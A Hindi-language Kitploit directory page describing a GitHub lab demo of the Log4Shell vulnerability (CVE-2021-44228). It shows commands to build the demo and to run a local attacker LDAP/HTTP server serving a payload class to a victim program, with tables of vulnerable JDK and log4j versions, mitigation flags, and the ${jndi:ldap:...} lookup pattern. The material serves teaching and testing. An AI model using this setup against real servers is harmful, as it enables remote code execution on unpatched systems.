Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
sample-ldap-exploit — CVE-2021-44228 का एक संक्षिप्त डेमो | Kitploit
उपकरण/GitHubGitHub/phoswald/sample-ldap-exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षापेलोड डेवलपमेंटलैब और अभ्यासArchived
GitHubphoswald/sample-ldap-exploit

sample-ldap-exploit

CVE-2021-44228 का एक संक्षिप्त डेमो

रिपॉजिटरी देखें
5214 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

sample-ldap-exploit

CVE-2021-44228 का एक छोटा प्रदर्शन

Build

root@kitploit:~
$ mvn clean verify

Run Attacker

root@kitploit:~
$ java \
  -cp 'attacker/target/sample-attacker.jar:attacker/target/lib/*' \
  sample.attacker.Attacker localhost 1389 sample.payload.Payload 8080 payload/target/sample-payload.jar

URLs:

  • http://localhost:8080/
  • http://localhost:8080/sample/payload/Payload.class

Run Victim

root@kitploit:~
$ java \
  -cp 'victim/target/sample-victim.jar:victim/target/lib/*' \
  sample.victim.Victim

परिणाम

JDK / JRE

संस्करणस्थिति
Oracle JDK 8u5असुरक्षित
OpenJDK 8u312सुरक्षित (जब तक -Dcom.sun.jndi.ldap.object.trustURLCodebase=true न हो)
IBM OpenJDK 8u312-b07 (OpenJ9)सुरक्षित (जब तक -Dcom.sun.jndi.ldap.object.trustURLCodebase=true न हो)
OpenJDK 11.0.7+10सुरक्षित (जब तक -Dcom.sun.jndi.ldap.object.trustURLCodebase=true न हो)
OpenJDK 11.0.13+8सुरक्षित (जब तक -Dcom.sun.jndi.ldap.object.trustURLCodebase=true न हो)
OpenJDK 16+36सुरक्षित (जब तक -Dcom.sun.jndi.ldap.object.trustURLCodebase=true न हो)
OpenJDK 17+35सुरक्षित (जब तक -Dcom.sun.jndi.ldap.object.trustURLCodebase=true न हो)
OpenJDK 17.0.1+12सुरक्षित (जब तक -Dcom.sun.jndi.ldap.object.trustURLCodebase=true न हो)

यदि सुरक्षित है, तो javax.naming.Context.lookup() से javax.naming.Reference का एक उदाहरण लौटाया जाता है।

यदि दूरस्थ कोड बेस से क्लास लोड करने के लिए असुरक्षित नहीं है, तो अन्य Java deserialization कमजोरियाँ संभवतः अभी भी मौजूद हैं!

log4j

संस्करणस्थिति
2.9.1असुरक्षित
2.10.0असुरक्षित (जब तक -Dlog4j2.formatMsgNoLookups=true या पर्यावरण चर LOG4J_FORMAT_MSG_NO_LOOKUPS=true न हो)
2.14.1असुरक्षित (जब तक -Dlog4j2.formatMsgNoLookups=true या पर्यावरण चर LOG4J_FORMAT_MSG_NO_LOOKUPS=true न हो)
2.15.0सुरक्षित

यदि सुरक्षित है, तो ${jndi:ldap:...} हल नहीं किया जाता है।

टूल डाउनलोड करें